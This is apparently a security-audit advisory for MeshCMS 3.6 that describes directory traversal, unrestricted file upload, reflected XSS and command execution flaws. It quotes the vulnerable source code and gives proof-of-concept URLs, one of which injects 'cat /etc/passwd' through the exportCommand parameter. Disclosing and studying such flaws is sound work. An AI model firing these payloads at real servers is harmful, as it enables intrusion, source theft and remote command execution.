开源J2EE CMS源码审计之MeshCMS学习实践
#############
受影响版本: MeshCMS 3.6 – Multiple vulnerabilities
Date: 2016-04-03
软件开发厂商: http://www.cromoteca.com/en/meshcms/
软件下载链接: http://www.cromoteca.com/en/meshcms/download/
版本: 3.6
测试平台: Windows OS

#############
开源MeshCMS介绍:
MeshCMS is an online editing system written in Java. It provides a set of features usually included in a CMS, but it uses a more traditional approach: pages are stored in regular HTML files and all additional features are file-based, without needing a database.

#############
Vulnerability Description:
1、Directory traversal Vulnerability(目录穿越漏洞)
该软件下载功能是通过名为DownloadServlet的servlet提供，下载过程中未限制文件扩展名，导致可下载源码文件。
String str = paramHttpServletRequest.getParameter("filename");
    if (Utils.isNullOrEmpty(str)) {
      str = localPath.getLastElement();
    }
    try
    {
      FileInputStream localFileInputStream = new FileInputStream((File)localObject);
      paramHttpServletResponse.setContentType("application/x-download");
      paramHttpServletResponse.setHeader("Content-Disposition", "attachment; filename=\"" + str + "\"");
      paramHttpServletResponse.setHeader("Content-Length", Long.toString(((File)localObject).length()));
      Utils.copyStream(localFileInputStream, paramHttpServletResponse.getOutputStream(), false);
    }
POC:
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/filemanager/upload1.jsp
http://127.0.0.1:8080/meshcms/servlet/org.meshcms.core.DownloadServlet/meshcms/admin/login.jsp


2、File Upload Vulnerability
the upload2.jsp don’t check the upload file’security(上传基本就瞎了，没任何过滤).
try {
    FileItem upItem = null;
    ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory());
    upload.setProgressListener(new UploadProgressListener(request.getSession(true)));
    List items = upload.parseRequest(request);
    Iterator iter = items.iterator();
    while (iter.hasNext()) {
      FileItem item = (FileItem) iter.next();
      if (item.getFieldName().equals("dir")) {
        path = new Path(item.getString());
      } else if (item.getFieldName().equals("fixname")) {
        fixName = Utils.isTrue(item.getString());
      } else if (item.getFieldName().equals("upfile") && item.getSize() > 0L) {
        upItem = item;
      }
    }
    if (upItem != null && path != null) {
      String fileName = new Path(upItem.getName()).getLastElement();
      if (fixName) {
        fileName = Utils.generateUniqueName
            (WebUtils.fixFileName(fileName, true), webSite.getFile(path));
      }

      ok = webSite.saveToFile(userInfo, upItem, path.add(fileName));
    }

3、反射型XSS
meshcms/meshcms/admin/目录下有个echo.jsp文件，fullsrc未做任何过滤。
try {
    response.resetBuffer();
  } catch (IllegalStateException ex) {
    //
  }
  response.getWriter().write(request.getParameter("fullsrc"));
%>

POC:
http://127.0.0.1:8080/meshcms/meshcms/admin/echo.jsp?fullsrc=%3Cscript%3Ealert%281%29%3C/script%3E


4、Command Execution Vulnerability
进行文件备份过程中staticexport2.jsp可根据客户端传入参数执行系统命令，exportCommand没有做任何过滤，导致命令执行漏洞。

if (!exportCommand.equals("")) {
      out.println("\nexecuting: " + exportCommand);
      Process process = Runtime.getRuntime().exec(exportCommand);
      out.println("standard output:");
      ByteArrayOutputStream baos = new ByteArrayOutputStream();
      Utils.copyStream(process.getInputStream(), baos, false);
      out.write(Utils.encodeHTML(baos.toString()));
      baos.reset();
      out.println("end of standard output\nerror output:");
      Utils.copyStream(process.getErrorStream(), baos, false);
      out.write(Utils.encodeHTML(baos.toString()));
      int exit = process.waitFor();
out.println("end of error output\nexecution finished with exit code " + exit);

POC:
http://127.0.0.1:8080/meshcms/meshcms/admin/staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd&exportSaveConfig=true

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入！